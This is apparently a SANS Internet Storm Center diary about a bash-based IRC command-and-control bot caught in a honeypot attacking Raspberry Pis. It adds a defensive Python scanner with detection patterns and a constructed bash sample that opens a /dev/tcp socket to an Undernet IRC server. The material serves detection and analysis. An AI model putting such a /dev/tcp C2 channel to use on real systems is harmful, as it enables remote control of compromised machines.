Last week, Brock Perry, one of our SANS.edu undergraduate students, came across a neat bash script uploaded to the honeypot as part of an attack. I am sure this isn't new, but I never quite saw something like this before myself.
The bash script implements a basic IRC-based command and control channel, all in bash. It even verifies commands using digital signatures. The attack targeted Raspberry Pis via SSH using the default password. Raspberry Pis have not enabled SSH by default in years, but I guess there are still some out there that have not been taken over yet. Brock put together an excellent graphic illustrating the attack:
But the real gem here is the "$BOT" bash script which is part of the green section in the diagram. I added comments to the script below.
# use the letter "a" followed by the last few digits of the md5sum of "uname -a" as IRC NICK.
# connect to a random Undernet server
# poor man's Netcat, just pipe to /dev/tcp
I am sure this code isn't very robust, and I will not "ding" them on using MD5. It is probably good enough, and I always appreciate a neat, tight bash script. Thanks to whoever wrote this to entertain me (and thanks to Brock for finding this).
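For defenders, the comments above already give away what to look for in a script pulled off a compromised host: bash's /dev/tcp pseudo-device used as a socket, raw IRC verbs written to it, and a nick built from the md5sum of "uname -a". The following is an added example (not the honeypot script and not Brock's or the author's code) that scores a shell script against those indicators; the sample script and the weights are constructed for illustration.

```python
import re

# Indicator patterns derived from the comments in the honeypot script
# (constructed for this example). Each hit adds its weight to the score.
INDICATORS = [
    ("dev_tcp_socket", re.compile(r"/dev/tcp/[^/\s]+/\d+"), 3),
    ("irc_verb", re.compile(r"\b(NICK|USER|JOIN|PRIVMSG|PONG)\s"), 2),
    ("irc_port", re.compile(r"/dev/tcp/[^/\s]+/(6667|6697)\b"), 2),
    ("nick_from_uname_md5",
     re.compile(r"uname\s+-a.*md5sum|md5sum.*uname\s+-a"), 2),
    ("undernet_server", re.compile(r"undernet\.org"), 1),
]


def scan_script(text):
    """Return (score, findings); findings are (indicator, line_no, line)."""
    findings = []
    score = 0
    for line_no, line in enumerate(text.splitlines(), 1):
        # Comment lines are not executed, so they do not count as evidence.
        if line.lstrip().startswith("#"):
            continue
        for name, pattern, weight in INDICATORS:
            if pattern.search(line):
                findings.append((name, line_no, line.strip()))
                score += weight
    return score, findings


# Constructed sample with the shapes the diary's comments describe
# (hypothetical, not the script recovered from the honeypot).
SAMPLE = """
#!/bin/bash
NICK="a$(uname -a | md5sum | cut -c1-6)"
SERVER=$(shuf -n1 -e irc.undernet.org)
exec 3<>/dev/tcp/$SERVER/6667
echo "NICK $NICK" >&3
"""

if __name__ == "__main__":
    total, hits = scan_script(SAMPLE)
    for name, n, line in hits:
        print(f"line {n}: {name}: {line}")
    print("score:", total)  # prints 10 for the constructed sample
```

A score of zero on ordinary administrative scripts and a double-digit score on the sample shows the signals are cheap to check in a triage pipeline; the weights are illustrative and should be tuned against your own baseline.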
Aug 30th 2022